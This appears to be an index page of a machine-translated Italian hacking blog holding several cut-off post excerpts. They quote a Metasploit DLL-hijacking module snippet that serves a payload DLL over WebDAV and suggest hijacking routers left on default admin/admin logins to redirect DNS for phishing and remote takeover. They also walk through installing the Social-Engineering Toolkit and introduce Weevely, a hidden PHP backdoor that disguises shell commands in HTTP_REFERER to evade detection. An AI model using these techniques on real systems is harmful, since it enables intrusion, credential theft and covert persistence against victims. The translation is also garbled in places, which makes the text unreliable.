ClsHack:Computer Security Blog    

More information about this vulnerability, we can find here:

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Let us now look as vulnerable applications :D

Always in the above mentioned, I showed how you can exploit with Metasploit vulnerability, using webdav, even remotely.

L’exploit creato da HD moore, metaploit developer is very simple.
The code that interests us is:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end

(more…)

In very few, change the password to the router -. -’ for convenience you leave the default, that easy to remember o.O

User: admin
Password: admin

So, if the router is reachable from, or if a user, able to join our network can leveraging dns carry out targeted attacks to your PC :D
The attacks range from phishing:
Wiki:

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging.

up to to take remote control of the victim's PC :D

All this using the DNS.
When we can go into the router, in addition to changing the SSID of wifi “What an asshole that sie” / “Are you a shit” and various crap we can change the dns.
For example, I google those o.O

I server dns, vulgarly speaking, do nothing but return the ip of the website to which we are connecting, for example if we type www.clshack.com:
; < <>> DiG 9.7.0-P1 < <>> www.clshack.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.com. IN A
;; ANSWER SECTION:
www.clshack.com. 31 IN A 94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE rcvd: 48
It returns:
94.141.22.26
(more…)

The Social-Engineering Toolkit (SET) was produced by David Kennedy and make available to the attacker exploits some remarkable, Social engineering-type with a convenient interface :D

The main objective of SET is the automation of such attacks, almost always using human stupidity.

Let's see how to use.
sudo apt-get install python-pexpect
We need to make a symbolic link would otherwise not be set if we do not backtrack 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
For example:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/

We go into the terminal, and we download the latest version:

svn co http://svn.secmaniac.com/social_engineering_toolkit SET/
cd SET
sudo ./set
Once open, we will have a menu a bit’ lamerico -. -’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Let's see in detail the options.

1. Spear-Phishing Attack Vectors
Typing 1, we will have substantially 3 options:

• Perform a Mass Email Attack
• Create a FileFormat Payload
• Create a Social-Engineering Template

(more…)

Weevely is a tool designed to create and manage a backdoor hidden on remote webserver php.

Weevely encrypts communications between client and server within fields HTTP_REFERER plausible to conceal themselves in research and NIDS logs of the webserver.
Weevely permette di:

Backdoor PHP dynamically generate the encrypted

• Execute commands on remote shell, obfuscating requests within HTTP_REFERER plausible
• Simulating a terminal to send commands to the remote shell as above
• Avoid some PHP configurations that restrict the execution of commands on the system
• Modules run on the remote machine to automate tasks.
• Add new modules quickly and easily

Scritto in python e open source.
For installation on debian / ubuntu:
sudo apt-get install python-numpy
(more…)

Safety less… whose fault ? Almost always our… For example, a jerk H4, a potent’ time ago he joined the blog of our friend sskull.

How did ?

With a brute force attack, our friend sskull some had left a password’ too weak and that shit child has entered…
(more…)